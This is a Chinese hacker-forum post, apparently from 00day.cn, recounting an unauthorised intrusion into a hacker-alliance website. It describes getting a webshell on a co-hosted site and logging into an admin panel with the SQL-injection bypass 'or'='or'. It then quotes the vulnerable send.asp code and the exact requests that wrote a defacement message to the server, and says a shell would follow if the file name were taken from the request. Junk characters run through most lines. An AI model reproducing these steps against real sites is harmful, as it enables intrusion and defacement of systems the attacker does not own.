|
|
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量' l2 W; I. D- s6 `+ ?0 }0 G6 u
今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程
: n" D J m, m: F" \! P# ^/ Z7 l! u这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来
0 V0 d. }! W* C我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东
- u& p! v% A+ B2 ^, w首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的
0 e* _4 Z$ }. A" Z$ {% g$ c服务器应该防ARP,不过这还只是猜测$ Y2 s2 `% [7 B$ @ K( \. U+ t
云中鸡说先不搞C段,PZ一下再说
/ B# @1 n& A: p: }# w然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]
8 @. Y! u; X1 b" F一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............
( ~1 R7 r p5 A' t4 I这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell
+ H' Z+ M6 l' m! o% H$ u# P我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT0 }: I- ?9 s+ b' ]) I7 W0 g
然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn! U; D3 ^8 G/ a. A$ x
看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟! d1 L& X8 V3 x& v3 Y) D
问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............5 q `& W( p/ d
无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~
4 p) R* H5 o) w# w$ U) b然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么9 d( Y4 t6 O8 u; ]1 I% O
打开一看,如图1所示。, g3 w+ V' @' N6 f ]+ z
) j' T/ H4 h2 F/ T# ^: f _ http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg4 G& a, Y2 @7 Y4 V
我靠~~这啥东西?这么帅?点进去一看,如图2所示。
1 I$ Z4 M3 ^; l# L
) E+ \: H' i/ t7 L( F5 J0 w http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg
4 ^! Y" }8 }5 d太帅了,真YD!!
4 ?5 G4 b3 I' P3 W这个页面应该是一套个人主页程序,而且还挺炫的!4 A! ~! k( Y2 G [. f0 j4 d
这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。
3 d& Q" I. p( f' h! _* G$ @. M/ S4 o5 E: y4 w4 J# X9 e+ L
http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg7 u7 J6 ~6 `! C8 c/ }6 ~8 n/ {
嘿嘿,试着'or'='or'居然进去了!!如图4所示。
" {/ y5 V7 D/ ?+ j' H- a3 l9 s4 ^+ _/ H' c) \" @- H; x2 c5 J( i, I
http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg* |. o/ ^1 V# |/ y, r. U! R1 D
经过半个多小时的摸索,还是没有发现可利用的地方。
- K9 a: Y4 K. j, ~4 b9 F/ n这下郁闷了,不管了,把这套程序下载下来看看吧
. e4 }% Q4 J$ g4 b8 `找了一会才知道这套程序叫做“V时代个人flash主页”& F B0 G; @ C( h9 b0 M s
到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用0 B2 n! E' i% {% q9 v
于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]]2 d- }/ V- d A% d- ~- p+ X- y
返回的确实找不到页面,郁闷了,输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]
* ], n0 Z, f+ K# I3 d6 W* u7 ]同样是找不到页面,真晕!再看看!0 \& ^: c" V7 w
5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!# i5 \$ ^& i% X1 U+ S
马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!
6 j0 y. U, @: W打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了!9 v$ @( Z: l, t% u0 w: B3 Z, g; h
希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:
+ t! ~& A% U r0 _8 T) i/ Q' t, h& U8 |, u: A+ D
var a
3 X u: ?$ ]7 Kvar b
/ E4 a+ Q5 [( R' ~9 mvar tx0 I# ?2 V5 s1 X) i) ? E! I
var clean
3 |. O+ V, E4 c6 ]8 Ba=Request("re")
, x# u* k2 V, f. U; i( f0 j6 {clean=Request("clean")
" U2 G4 G% }2 k, v+ n4 e% U/ Nvar jian="test.txt"
3 w6 E0 m; @* ]# ?- e H1 I+ j- }5 ]7 `$ ^; y+ `) ~$ L* E
if(clean==1){8 k5 @# P: K# S
tx="&a="4 U. f1 t" S4 g! R0 I2 Y& i
var fs2
; L1 X% I: [' A* E- l# evar fs2=Server.CreateObject("Scripting.FileSystemObject")
9 ^3 N ~& ^$ ~var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)
$ ?8 p* p6 h, F) Z0 D; m4 Hnewdt.WriteLine("&a=")7 Q; R; O: p+ J8 L0 i: G
newdt.close()' G9 H( j( |# s
}
/ ]( ?9 p$ e/ I
' u2 o3 }* }( w1 ?if(clean==0|clean==1){3 ^% X5 z& t4 G( b, h. S3 Y, T
tx="", _! L& b! I) Y) Z+ M5 A5 ]4 y
var fso = Server.Createobject("Scripting.FileSystemObject")
3 u; Z# a5 o H0 w5 S7 R6 Fvar file = fso.OpenTextFile(Server.Mappath(jian))# }' r: a7 ]* X0 R% y
while (!file.AtEndOfStream){1 R' w! m6 B4 K# h d/ c$ ]
tx=file.ReadLine()4 E9 F; s+ } B
Response.write (tx)
: q& \6 i+ K. I8 H1 }- _: t}
; r) }6 E2 ~* T3 G l' FResponse.write ("&")* U& K% d: R7 m: h- U9 S
file.close()$ C+ [. ?& C; r4 X8 D. ~
}
. A" O+ N- K; T4 s$ T" A* l$ n- m2 x& x8 G
if(clean==2){
9 O3 Z7 P9 H; Gtx=""1 \) @) [% x# f" b9 u7 N
var fso = Server.Createobject("Scripting.FileSystemObject"): I. E( O- L; w( e b2 i% a& t/ A
var file = fso.OpenTextFile(Server.Mappath(jian))
2 [: Q' V8 { P' p3 G, B
$ @6 V5 H7 m0 K& Wvar fs2
; x t8 _( o7 Y+ C7 hvar fs2=Server.CreateObject("Scripting.FileSystemObject") H1 f- A c3 `+ f6 v8 z+ {5 I
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)' x1 c/ R- l4 B `& K
3 q& `8 C/ a1 g) _2 b) D, ]( J
; k) p& u- B; Xwhile (!file.AtEndOfStream){
, E2 c7 `/ v. U. p: p; Ftx=file.ReadLine()
$ G; |- r. `' n, B2 \4 jResponse.write (tx)}0 q7 l! f% j) M/ @
8 v* O3 O4 M7 {" i0 ?) Q" ~) F
Response.write (a+"&")
0 A0 D" S8 @6 b" I! n. vnewdt.WriteLine(a)( L; B0 G: d1 s
9 _8 |3 d0 G6 I4 p
file.close()
. ?$ _3 q- B: o5 q5 enewdt.close()3 h. ^7 J+ V2 i! K) {0 G
}
* J) ?$ X9 x( L8 V. _( D4 A: l
& L9 Y) z$ y( g- W复制代码3 j3 w( h) s& E% M" P8 Z
这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”
& B, R- e6 e, ?8 |/ E接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”
# }: B: r8 ?* L+ ^) o- l; ]' {这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
- v$ Y% a5 Q7 A3 a3 `过程如图5、6所示。
/ s$ \% r" f: L# L# G, L% b# w
0 W. z1 C. `8 x' t3 ahttp://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg3 c* k0 M2 M9 f4 }" \9 F( [: }/ N) n
" A6 b' f6 q$ z7 ?6 C& w* h+ i
http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg! Q# R/ k) w+ n! y
提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。
! I% `: a' W, q1 k
* X% y1 @- d! l, s http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg8 T( D3 D2 E2 I8 S) i2 j
这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的
3 A7 l0 V$ ]; e; [. C& |' o如果jian是经过request取值的话,同样也能搞到shell。
. ]* ]0 l$ v' s+ Z7 H1 l) `& {这次只是装到了X,并没有拿到shell6 o3 W q! Z2 e7 |. G8 e1 g c
已经是凌晨了,跟云中J说了声就睡觉去鸟
( [9 `$ r! v3 p8 K/ d" D估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙
8 v& D) A* M! Q* j6 s, U就到这里吧,没技术含量,纯粹装X,高手们见笑了
0 s+ v, D8 ~; M另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己
. t# _5 D; O" ]# f自己学不到技术,却还在自欺欺人# n$ e6 J9 ?, J! B j6 T
不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~/ {! ~" ^+ E% X" ?
# y$ u! B4 @5 ?& ~ |
|